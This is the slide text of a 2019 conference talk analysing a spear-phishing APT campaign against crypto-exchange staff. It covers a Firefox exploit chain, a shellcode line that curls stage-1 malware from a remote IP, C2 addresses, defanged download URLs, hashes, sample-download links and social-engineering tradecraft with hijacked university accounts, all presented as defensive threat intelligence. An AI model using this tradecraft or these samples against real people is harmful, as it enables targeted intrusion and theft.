SlideShare une entreprise Scribd logo
1  sur  114
CODE BLUE
2019 @TOKYO
H e u n g s o o K a n g , L I N E
DISCRETION IN APT

Recent attack on crypto exchange services
CODE BLUE
2019 @TOKYO
$ whoami
- Heungsoo Kang (David)
-
- Mobile messenger loved in Asia
- Lots of services
- Also Crypto/FIAT exchange BITBOX / BITMAX
- We care security very much!
- Contact
- cmpdebugger@gmail.com / @jz__
2
CODE BLUE
2019 @TOKYO
3
About this talk
- Background
- Coinbase announced it’s been attacked by a very sophisticated, highly targeted
attack
- Coinbase blog / Philip Martin (@SecurityGuyPhil)
- Decent analysis by objective-see.com
- Undisclosed, but LINE was also targeted
CODE BLUE
2019 @TOKYO
4
- Background
- Coinbase announced it’s been attacked by a very sophisticated, highly targeted
attack
- Coinbase blog / Philip Martin (@SecurityGuyPhil)
- Decent analysis by objective-see.com
- Undisclosed, but LINE was also targeted
About this talk
CODE BLUE
2019 @TOKYO
About this talk
- Goal of this talk
- To share the perspectives of …
- The victim (how it looked like to him)
- The attackers (what they had prepared)
- The blue-team (what we could/not see)
- To share information about …
- Its malware
- Attackers
5
CODE BLUE
2019 @TOKYO
About this talk
- Goal of this talk
- To share the perspectives of …
- The victim (how it looked like to him)
- The attackers (what they had prepared)
- The blue-team (what we could/not see)
- To share information about …
- Its malware
- Attackers
6
CODE BLUE
2019 @TOKYO
Perspective 1: Victim
7
How it looked over the surface
CODE BLUE
2019 @TOKYO
About Victim
- A talented developer
- :~10 years of experience
- Device
- iPhone
- MacBook Pro
8
CODE BLUE
2019 @TOKYO
Email Conversation
- Victim receives an email through his personal account
- sender
- nm603@cam.ac.uk
9
CODE BLUE
2019 @TOKYO
Email Conversation
- Victim receives an email through his personal account
- sender
- nm603@cam.ac.uk
- Legit from cam.ac.uk
10
Passed SPF/DKIM/DMARC
CODE BLUE
2019 @TOKYO
Email Conversation
- Victim receives an email through his personal account
- sender
- nm603@cam.ac.uk
- Legit from cam.ac.uk
- Link uses legit cam.ac.uk
11
CODE BLUE
2019 @TOKYO
Email Conversation
- Victim receives an email through his personal account
- sender
- nm603@cam.ac.uk
- Legit from cam.ac.uk
- Link uses legit cam.ac.uk
- Adams Prize is 

“Looking for field experts”
12
CODE BLUE
2019 @TOKYO
Email Conversation
- Victim receives an email through his personal account
- sender
- nm603@cam.ac.uk
- Legit from cam.ac.uk
- Link uses legit cam.ac.uk
- Adams Prize is 

“Looking for field experts”
- LinkedIn profile
13
CODE BLUE
2019 @TOKYO
Email Conversation
14
- Victim receives an email through his personal account
- sender
- nm603@cam.ac.uk
- Legit from cam.ac.uk
- Link uses legit cam.ac.uk
- Adams Prize is 

“Looking for field experts”
- LinkedIn profile
CODE BLUE
2019 @TOKYO
Email Conversation
- LinkedIn Profile
- 100+ connections
- Nice fit to the story
15
CODE BLUE
2019 @TOKYO
Email Conversation
- Victim shares conversation with the attacker doubtlessly
16
CODE BLUE
2019 @TOKYO
Email Conversation
- Victim gets the exploit link, ID, temporary PW
17
CODE BLUE
2019 @TOKYO
Email Conversation
- Victim gets the exploit link, ID, temporary PW
18
CODE BLUE
2019 @TOKYO
Web Browsing
- Victim visits the URL … to see a warning
19
CODE BLUE
2019 @TOKYO
Web Browsing
- Victim visits the URL … to see a warning - “Firefox only”
20
Official Firefox Page
CODE BLUE
2019 @TOKYO
Web Browsing
- Victim visits the URL … to see a warning - “Firefox only”
21
Official Firefox Page
CODE BLUE
2019 @TOKYO
Web Browsing
- With Firefox, web page shows up
22
CODE BLUE
2019 @TOKYO
Exploit
- Firefox downloaded exploit javascript
- shellcode uses curl http://x.x.x.x/malw so it doesn’t trigger MacOS GateKeeper
- The attack was stopped here
- Detected, suspended & killed
- Red flag based on various indictors + in-house tools
23
CODE BLUE
2019 @TOKYO
Exploit
- Firefox downloaded exploit javascript
- shellcode uses curl http://x.x.x.x/malw so it doesn’t trigger MacOS GateKeeper
- The attack was stopped here
- Detected, suspended & killed
- Red flag based on various indictors + in-house tools
24
CODE BLUE
2019 @TOKYO
Response
- Victim gets interrogated
25
CODE BLUE
2019 @TOKYO
Response
- Victim gets interrogated Just kidding..
- Victim gets interviewed and helps security team get the picture
- Security team follows up, prepare additional tracking
- Stage1 sends system information, downloads stage2 malware
26
CODE BLUE
2019 @TOKYO
Response
- Victim gets interrogated Just kidding..
- Victim gets interviewed and helps security team get the picture
- Security team follows up, prepare additional tracking
- Stage1 sends system information, downloads stage2 malware
- Stage1 - macos.netwire variant

Stage2 - macos.mokes variant
27
CODE BLUE
2019 @TOKYO
Perspective 2: Attackers
28
What lies beneath
CODE BLUE
2019 @TOKYO
Prepare Weapons
- Prepare weaponized exploits
- Firefox code execution (CVE-2019-11707)
- Firefox sandbox escape (CVE-2019-11708)
29
CODE BLUE
2019 @TOKYO
Prepare Weapons
- Prepare malwares
- Stage 1 - Report victim information
- Scout. Small, new, low detection
- Stage 2
- Full Remote Administrator Tool
30
CODE BLUE
2019 @TOKYO
Prepare Weapons
- Prepare malwares
- Stage 1 - Report victim information
- Scout. Small, new, low detection
- Stage 2
- Full Remote Administrator Tool
31
CODE BLUE
2019 @TOKYO
Prepare Infra
- Prepare servers
- C2
- Stage 1 - 89.34.111.113 (qhoster.com, Uruguay)
- Stage 2 - 185.49.69.210 (leaseweb.com, UK)

- 142.93.110.250 (digitalocean.com, US)
- Host malware
- 185.162.131.96 (king-servers.com, Russia)
32
CODE BLUE
2019 @TOKYO
Prepare Infra
- Prepare servers
- Host exploit
- 54.38.93.182 (ovh.com, France)
- Buy domain analyticsfit.com
- Payment for the servers
- Credit card, PayPal, BTC, ZCash, Monero, etc
33
CODE BLUE
2019 @TOKYO
Hack Accounts
- Hack accounts for attack
- At least 2 accounts from cam.ac.uk hacked
- nm603@, grh37@, ...
34
CODE BLUE
2019 @TOKYO
Hack Accounts
- Accounts’ hack method is undisclosed
- Phishing on individuals?
- Credential stuffing? (Using leaked ID/passwords)
- Brute force?
- DB compromise?
35
CODE BLUE
2019 @TOKYO
Hack Accounts
- The University has a bold service, useful for OSINT
- anyone can list accounts
- http://jackdaw.cam.ac.uk/mailsearch/
- Email account search 

service
- Useful for everyone

(Students, and…)
36
CODE BLUE
2019 @TOKYO
Hack Accounts
- The University has a bold service, useful for OSINT
- anyone can list accounts
- http://jackdaw.cam.ac.uk/mailsearch/
- Email account search 

service
- Useful for everyone

(Students, and…)
37
CODE BLUE
2019 @TOKYO
University Accounts
- Service for the account owners:
- Email address: nm603@cam.ac.uk
- Personal web hosting
- hxxp://people.ds.cam.ac.uk/nm603
38
CODE BLUE
2019 @TOKYO
University Accounts
- Service for the account owners:
- Email address: nm603@cam.ac.uk
- Personal web hosting
- hxxp://people.ds.cam.ac.uk/nm603
39
Makes it all
look authentic
CODE BLUE
2019 @TOKYO
Prepare Website
- Prepare web pages on people.ds.cam.ac.uk
- Fake University site
40
CODE BLUE
2019 @TOKYO
Prepare Website
- Prepare web pages on people.ds.cam.ac.uk
- Add simple javascript for social engineering
- “Please use Firefox …”
- Load exploit
41
CODE BLUE
2019 @TOKYO
Script on Fake Website
42
CODE BLUE
2019 @TOKYO
Script on Fake Website
- if (macos && not firefox) then show “use Firefox” message
43
CODE BLUE
2019 @TOKYO
Script on Fake Website
- if (macos && not firefox) then show “use Firefox” message
44
CODE BLUE
2019 @TOKYO
Script on Fake Website
- if (macos && firefox) or (not macos) then load /script.js







- So people.ds.cam.ac.uk/script.js must be the exploit!
45
CODE BLUE
2019 @TOKYO
Script on Fake Website
- So people.ds.cam.ac.uk/script.js must be the exploit!
46
CODE BLUE
2019 @TOKYO
Script on Fake Website
- So people.ds.cam.ac.uk/script.js must be the exploit!

→ No.
47
Actual packet capture of victim at the time of attack
CODE BLUE
2019 @TOKYO
Script on Fake Website
- So people.ds.cam.ac.uk/script.js must be the exploit!

→ No.
48
CODE BLUE
2019 @TOKYO
Script on Fake Website
- Actual exploit code was loaded at the end of HTML
- Made it look like Google’s analytics.js
- All websites have them at the end
- HTTPS
49
CODE BLUE
2019 @TOKYO
Prepare John Doe
- The accounts they hacked are [nm603, grh37]
- Make up names accordingly: Neil Morris, Gregory Harris
- Join LinkedIn, make profile fit to the storyline (Univ staff)
- Add connections, 100++
- How we all love to accept random requests
- Write a nice email signature
- Add links to website, LinkedIn
50
CODE BLUE
2019 @TOKYO
Prepare John Doe
- The accounts they hacked are [nm603, grh37]
- Make up names accordingly: Neil Morris, Gregory Harris
- Join LinkedIn, make profile fit to the storyline (Univ staff)
- Add connections, 100++
- How we all love to accept random requests
- Write a nice email signature
- Add links to website, LinkedIn
51
CODE BLUE
2019 @TOKYO
Prepare John Doe
- The accounts they hacked are [nm603, grh37]
- Make up names accordingly: Neil Morris, Gregory Harris
- Join LinkedIn, make profile fit to the storyline (Univ staff)
- Add connections, 100++
- How we all love to accept random requests
- Write a nice email signature
- Add links to website, LinkedIn
52
CODE BLUE
2019 @TOKYO
Start Operation
- Set targets - look for cryptocurrency exchange employees
- Start by opening conversation through email
- Evaluate targets through conversation
- Select targets related to cryptocurrency exchanges
- Guide ONLY selected targets to the exploit page
53
CODE BLUE
2019 @TOKYO
Start Operation
- Set targets - look for cryptocurrency exchange employees
- Start by opening conversation through email
- Evaluate targets through conversation
- Select targets related to cryptocurrency exchanges
- Guide ONLY selected targets to the exploit page
54
CODE BLUE
2019 @TOKYO
Operation: Evaluate Targets
- Evaluate targets through conversation (cont’d) - another case
- https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear-
phished/
- Review on how he “almost” got hacked by this campaign
- Author communicated via email with grh37@cam.ac.uk
- He was not guided to the final exploit page
- Initially selected as target, but evaluated out.
55
CODE BLUE
2019 @TOKYO
Operation: Evaluate Targets
- Evaluate targets through conversation (cont’d) - another case
- https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear-
phished/
- Review on how he “almost” got hacked by this campaign
- Author communicated via email with grh37@cam.ac.uk
- He was not guided to the final exploit page
- Initially selected as target, but evaluated out.
56
CODE BLUE
2019 @TOKYO
Operation: Evaluate Targets
- Evaluate targets through conversation (cont’d) - another case
- https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear-
phished/

















57
CODE BLUE
2019 @TOKYO
Operation: Evaluate Targets
- Evaluate targets through conversation (cont’d)
- https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear-
phished/
58
CODE BLUE
2019 @TOKYO
Operation: Evaluate Targets
- Evaluate targets through conversation (cont’d)
- https://robertheaton.com/2019/06/24/i-was-7-words-away-from-being-spear-
phished/
59
CODE BLUE
2019 @TOKYO
Operation: Goal
- Initial exploit → run stage 1 malware
- Stage 1 malware reports information about victim
- Stage 1 malware downloads stage 2 malware (full RAT)
- Go for profit!! $$
60
CODE BLUE
2019 @TOKYO
Perspective 3: Blue Team
61
What can we see? Challenges?
CODE BLUE
2019 @TOKYO
Blue Team Downsides
- Cliche, yes
- Too many stuff to watch
- Employees from many countries
- Huge infrastructure
- Countless servers (we have our own AWS - “Verda”)
62
CODE BLUE
2019 @TOKYO
Blue Team Weapons
- From Infrastructure
- Network based defense/detection methods
- Network visibility solutions to see HTTPS connection
- From Endpoint
- Endpoint Detection & Response / Antivirus
- Patch Management System
- Various monitoring solutions, etc
63
CODE BLUE
2019 @TOKYO
Blue Team Weapons
- From Infrastructure
- Network based defense/detection methods
- Network visibility solutions to see HTTPS connection
- From Endpoint
- Endpoint Detection & Response / Antivirus
- Patch Management System
- Various monitoring solutions, etc
64
CODE BLUE
2019 @TOKYO
Blue Team Weapons
- Honeypots, sandboxes
- Indicators of Compromise service
- Network segregation / air-gapping
- Authentication, 2FA
- Desktop Virtualization
- More & more…



→ Usable security: should avoid oppressing productivity
65
CODE BLUE
2019 @TOKYO
Blue Team Weapons
- Honeypots, sandboxes
- Indicators of Compromise service
- Network segregation / air-gapping
- Authentication, 2FA
- Desktop Virtualization
- More & more…



→ Usable security: should avoid oppressing productivity
66
CODE BLUE
2019 @TOKYO
Blue Team Weapons
- Honeypots, sandboxes
- Indicators of Compromise service
- Network segregation / air-gapping
- Authentication, 2FA
- Desktop Virtualization
- More & more…



→ Usable security: should avoid oppressing productivity
67
CODE BLUE
2019 @TOKYO
Pain Point for Blue Team
- Attackers sent email to victim’s personal Gmail account
- Legit cam.ac.uk email + website
- HTTPS + encrypted communication
- Low detection (Stage1=1, Stage2=0 detection on VirusTotal)
- Encrypted, non-HTTPS protocol for C2 connection on port 443
- Diverse use of servers (exploit, malware download, c2, etc)
- Download stage2 outside of corp network to avoid detection
68
CODE BLUE
2019 @TOKYO
Pain Point for Blue Team
- Attackers sent email to victim’s personal Gmail account
- Legit cam.ac.uk email + website
- HTTPS + encrypted communication
- Low detection (Stage1=1, Stage2=0 detection on VirusTotal)
- Encrypted, non-HTTPS protocol for C2 connection on port 443
- Diverse use of servers (exploit, malware download, c2, etc)
- Download stage2 outside of corp network to avoid detection
69
CODE BLUE
2019 @TOKYO
Pain Point for Blue Team
- Attackers sent email to victim’s personal Gmail account
- Legit cam.ac.uk email + website
- HTTPS + encrypted communication
- Low detection (Stage1=1, Stage2=0 detection on VirusTotal)
- Encrypted, non-HTTPS protocol for C2 connection on port 443
- Diverse use of servers (exploit, malware download, c2, etc)
- Download stage2 outside of corp network to avoid detection
70
CODE BLUE
2019 @TOKYO
Breadcrumbs for Blue Team
- Shellcode - curl - macho(executable) download
- Communication to suspicious IP addresses (C2)
- Unknown new executable files
- Security team had resource to analyze & follow up
- Plus other undisclosable indicators & methods
71
CODE BLUE
2019 @TOKYO
Breadcrumbs for Blue Team
- Shellcode - curl - macho(executable) download
- Communication to suspicious IP addresses (C2)
- Unknown new executable files
- Security team had resource to analyze & follow up
- Plus other undisclosable indicators & methods
72
CODE BLUE
2019 @TOKYO
Breadcrumbs for Blue Team
- Shellcode - curl - macho(executable) download
- Communication to suspicious IP addresses (C2)
- Unknown new executable files
- Security team had resource to analyze & follow up
- Plus other undisclosable indicators & methods
73
CODE BLUE
2019 @TOKYO
Malware Information
74
Stage 1 & 2
CODE BLUE
2019 @TOKYO
Stage 1 - Overview
- NETWIRE
- Commercial administration tool
- Agent builder
75
CODE BLUE
2019 @TOKYO
Stage 1 - Overview
- NETWIRE
- Commercial administration tool
- Agent builder
76
CODE BLUE
2019 @TOKYO
Stage 1 - Overview
- Hash
- MD5 - de3a8b1e149312dac5b8584a33c3f3c6
- SHA256 -
07a4e04ee8b4c8dc0f7507f56dc24db00537d4637afee43dbb9357d4d54f6ff4
- Downloaded from
- hxxp://185.162.131.96/i/IconServicesAgent
77
CODE BLUE
2019 @TOKYO
Stage 1 - Overview
- C2 Server
- 89.34.111.113 - port closed
- Binary is not signed
78
CODE BLUE
2019 @TOKYO
Stage 1 - NETWIRE
- C2 Protocol
- https://github.com/pan-unit42/public_tools/blob/master/netwire/
commands.json
- XOR command with xe3
- Handle C2 command func at 0x4109
79
CODE BLUE
2019 @TOKYO
Stage 1 - NETWIRE
- Report user/host information
- Report user external IP
80
CODE BLUE
2019 @TOKYO
Stage 1 - NETWIRE
- List process
- Start shell
81
CODE BLUE
2019 @TOKYO
Stage 1 - NETWIRE
- Search / Write / Execute file
- Heartbeat (I’m alive)
82
CODE BLUE
2019 @TOKYO
Stage 1 - NETWIRE
83
CODE BLUE
2019 @TOKYO
Stage 1 - NETWIRE
- Persistence
84
CODE BLUE
2019 @TOKYO
Stage 1 - NETWIRE
- Persistence
85
CODE BLUE
2019 @TOKYO
Stage 1 - NETWIRE
- Persistence - “Don’t want to die”
- Adds itself to signal handler
86
CODE BLUE
2019 @TOKYO
Stage 1 - NETWIRE
- Downloads stage 2
- Shell executed after downloading … left a shell history file
87
CODE BLUE
2019 @TOKYO
Stage 1 - string “hyd7u5jdi8”
- Unique string found -> RC4 key
- This netwire binary contains 4 RC4 keys in total.
- Key string “hyd7u5jdi8” is used only once for decrypting “%Rand%”
88
CODE BLUE
2019 @TOKYO
Stage 1 - variants
- hxxp://185.162.131.96 (download server) is still up (Apache)
- Brute-forced server: found some variants in directory
- hxxp://185.162.131.96/i/195/195

hxxp://185.162.131.96/i/kr

hxxp://185.162.131.96/i/kri

hxxp://185.162.131.96/i/pm

hxxp://185.162.131.96/i/pmi

hxxp://185.162.131.96/i/thk
- Same code, different data by different RC4 key
- But has same key “hyd7u5jdi8”
89
CODE BLUE
2019 @TOKYO
Stage 1 - variants
- hxxp://185.162.131.96 (download server) is still up (Apache)
- Brute-forced server: found some variants in directory
- hxxp://185.162.131.96/i/195/195

hxxp://185.162.131.96/i/kr

hxxp://185.162.131.96/i/kri

hxxp://185.162.131.96/i/pm

hxxp://185.162.131.96/i/pmi

hxxp://185.162.131.96/i/thk
- Same code, different data by different RC4 key
- But has same key “hyd7u5jdi8”
90
CODE BLUE
2019 @TOKYO
Stage 1 - variants
- hxxp://185.162.131.96/i/IconServicesAgent de3a8b1e149312dac5b8584a33c3f3c6
- hxxp://185.162.131.96/i/195/195 b6f92b20816f23c147445bd5eec86a06
- hxxp://185.162.131.96/i/kr 8b2b7537c792ecf24d8ee7b9fbb942f8
- hxxp://185.162.131.96/i/kri 5030422b3428c0f938e3ad03720ca9e8
- hxxp://185.162.131.96/i/pm 70286abc22eca9a9cbea24e551c891cd
- hxxp://185.162.131.96/i/pmi de3a8b1e149312dac5b8584a33c3f3c6
- hxxp://185.162.131.96/i/thk fc99b1407655674573ee4167f1e3dcbd
91
CODE BLUE
2019 @TOKYO
Stage 1 - variants
- Uploaded to VT - https://tinyurl.com/brutedown
- Downloadable here - https://tinyurl.com/brutedown2
92
CODE BLUE
2019 @TOKYO
Stage 2 - Overview
- Hash
- MD5 - af10aad603fe227ca27077b83b26543b
- SHA256 -
97200b2b005e60a1c6077eea56fc4bb3e08196f14ed692b9422c96686fbfc3ad
- Downloaded by stage1
93
CODE BLUE
2019 @TOKYO
Stage 2 - Overview
- macos.Mokes
- Remote administration tool
- C2 Server
- 185.49.69.210 port 443|80 (closed)
- athlon4free2updates1.com / 142.93.110.250
- Alive but not sending payload
94
CODE BLUE
2019 @TOKYO
Stage 2
- Certificate invalid
95
CODE BLUE
2019 @TOKYO
Stage 2 - Overview
- Built with QT - huge binary size (13MB)
- FLIRT for QT versions, OpenSSL - Only 20% identified
- Also not signed
96
CODE BLUE
2019 @TOKYO
Stage 2
- Self copy as randomly one of these names
97
CODE BLUE
2019 @TOKYO
Stage 2
- Persistence
98
CODE BLUE
2019 @TOKYO
Stage 2
- Hides application from Macos Dock
- Searches for file - AutoFileSearchTask::files_to_search
99
CODE BLUE
2019 @TOKYO
More About Campaign
100
Connecting dots on their “Work habits”
CODE BLUE
2019 @TOKYO
Previous Analysis
- Named
- Only recently referred as “HydSeven” after coincheck attack
- From RC4 key string “hyd7u5jdi8”
- History
- Known for attacking banks, undisclosed financial biz
- Introduced in FireEye Trend (2017)
- https://tinyurl.com/firetrend
- Nice overview by mertsarica.com (2017)
- https://tinyurl.com/1mertsa
- https://tinyurl.com/2mertsa
101
CODE BLUE
2019 @TOKYO
Previous Analysis
- Attack analysis by Exatel (2016)
- https://tinyurl.com/1exatel
- Analysis on coincheck hack by LAC Watch (2019)
- https://tinyurl.com/lac-coincheck
102
CODE BLUE
2019 @TOKYO
Initial Compromise
- Based on spear phishing
- Office document with macro
- Office 1-day exploit (EPS)
- WinRar 1-day exploit (ACE path)
- 0-day exploit (FireFox)
103
CODE BLUE
2019 @TOKYO
Favorite Method
- Hacked London School of Economics account
- Use the account for email communication
- We need expert like you as jury for ‘Banker Awards’
104
[https://tinyurl.com/1mertsa]
CODE BLUE
2019 @TOKYO
Favorite Method
- Hacked London School of Economics account
- Use the account for email communication
- We need expert like you as jury for ‘Banker Awards’
105
[https://tinyurl.com/1mertsa]
CODE BLUE
2019 @TOKYO
Favorite Method
- Hacked London School of Economics account
- Use the account for email communication
- We need expert like you as jury for ‘Banker Awards’
- Abuse university’s web hosting for phishing
106
[https://tinyurl.com/1mertsa]
CODE BLUE
2019 @TOKYO
Favorite Method
- Not afraid of making conference calls with victims
107
[https://tinyurl.com/2mertsa]
CODE BLUE
2019 @TOKYO
Favorite Method
- Abuse LinkedIn account
- Impersonate someone with same/similar name
108
[https://tinyurl.com/1mertsa]
CODE BLUE
2019 @TOKYO
Favorite Method
- Hacked Angelina College
109
[https://tinyurl.com/firetrend]
CODE BLUE
2019 @TOKYO
Favorite VPS
- This attack: OVH, LeaseWeb, King-Servers, QHoster
- Previous campaign
- OVH x 6
- LeaseWeb x 6
- King-Servers x 1
- QHoster x 1
- Etc (Vultr, netsec.com, HostSailor, etc)
110
CODE BLUE
2019 @TOKYO
But…
- Why him?
- Attack on 1 employee
- For exchange? Individual?
111
CODE BLUE
2019 @TOKYO
Conclusion - Attackers
- Decent social engineering
- Use of compromised university accounts (email/site)
- Responsive communication
- Use of 0-day/n-day exploits - or just office+macro
- Malware
- NETWIRE/MOKES
- Platform independent source code (Windows, MacOS, Linux)
- Manage low detection from AV
- Use digital certificates for Windows binary
- Active
- Skilled operators
112
CODE BLUE
2019 @TOKYO
113
Minimize the risk while maintaining usable security
User education:
Consciousness on 

spear-phishing
Defense in depth:
Block SOMEWHERE in the middle

Block SOMETIME in the middle
Detections & sensors:
EPP(AV), Network monitoring ,
honeypots, IoC, Human resource
Conclusion - Countermeasure
CODE BLUE
2019 @TOKYO
114
- Contact
- cmpdebugger@gmail.com
- @jz__
- id: heungsookang
Questions?

Contenu connexe

Tendances

Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
Study on Zeus Banking Malware
Study on Zeus Banking MalwareStudy on Zeus Banking Malware
Study on Zeus Banking MalwareShaik Anisa
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsMen and Mice
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Linux에서 Secondary VNIC와 Secondary Private IP 추가 방법
Linux에서 Secondary VNIC와 Secondary Private IP 추가 방법Linux에서 Secondary VNIC와 Secondary Private IP 추가 방법
Linux에서 Secondary VNIC와 Secondary Private IP 추가 방법JC Park
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
F5 - BigIP ASM introduction
F5 - BigIP ASM introductionF5 - BigIP ASM introduction
F5 - BigIP ASM introductionJimmy Saigon
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Kali linux useful tools
Kali linux useful toolsKali linux useful tools
Kali linux useful toolsmilad mahdavi
 
MindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetMindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetJuan F. Padilla
 
Aaron Mildenstein - Using Logstash with Zabbix
Aaron Mildenstein - Using Logstash with ZabbixAaron Mildenstein - Using Logstash with Zabbix
Aaron Mildenstein - Using Logstash with ZabbixZabbix
 
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...Benjamin Delpy
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavRomansh Yadav
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...idsecconf
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]RootedCON
 

Tendances (20)

Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
Study on Zeus Banking Malware
Study on Zeus Banking MalwareStudy on Zeus Banking Malware
Study on Zeus Banking Malware
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing Solutions
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Linux에서 Secondary VNIC와 Secondary Private IP 추가 방법
Linux에서 Secondary VNIC와 Secondary Private IP 추가 방법Linux에서 Secondary VNIC와 Secondary Private IP 추가 방법
Linux에서 Secondary VNIC와 Secondary Private IP 추가 방법
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
F5 - BigIP ASM introduction
F5 - BigIP ASM introductionF5 - BigIP ASM introduction
F5 - BigIP ASM introduction
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Kali linux useful tools
Kali linux useful toolsKali linux useful tools
Kali linux useful tools
 
MindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetMindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat Sheet
 
Ipsec vpn v0.1
Ipsec vpn v0.1Ipsec vpn v0.1
Ipsec vpn v0.1
 
Bringing up Aruba Mobility Master, Managed Device & Access Point
Bringing up Aruba Mobility Master, Managed Device & Access PointBringing up Aruba Mobility Master, Managed Device & Access Point
Bringing up Aruba Mobility Master, Managed Device & Access Point
 
Aaron Mildenstein - Using Logstash with Zabbix
Aaron Mildenstein - Using Logstash with ZabbixAaron Mildenstein - Using Logstash with Zabbix
Aaron Mildenstein - Using Logstash with Zabbix
 
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
 
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadavMobile security part 1(Android Apps Pentesting)- Romansh yadav
Mobile security part 1(Android Apps Pentesting)- Romansh yadav
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
 
Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]Carlos García - Pentesting Active Directory [rooted2018]
Carlos García - Pentesting Active Directory [rooted2018]
 

Similaire à [CB19] Recent APT attack on crypto exchange employees by Heungsoo Kang

Anatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing AttackAnatomy of a Spear Phishing Attack
Anatomy of a Spear Phishing AttackMark Mair
 
DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...
DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...
DEF CON 27 -JENS MUELLE - re what's up Johnny covert content attacks on email...Felipe Prado
 
LinkedIn (St. John) Presentation 2019
LinkedIn (St. John) Presentation 2019LinkedIn (St. John) Presentation 2019
LinkedIn (St. John) Presentation 2019Denis Curtin
 
Anatomy of a spear phishing attack
Anatomy of a spear phishing attackAnatomy of a spear phishing attack
Anatomy of a spear phishing attackMark Mair
 
Seminar on Phishing Protection
Seminar on Phishing ProtectionSeminar on Phishing Protection
Seminar on Phishing ProtectionCristian Garcia G.
 
Social Engineering and other Foes in the GDPR Year
Social Engineering and other Foes in the GDPR YearSocial Engineering and other Foes in the GDPR Year
Social Engineering and other Foes in the GDPR YearMassimo Chirivì
 
Hacking TYPO3 v9 (T3DD19 edition)
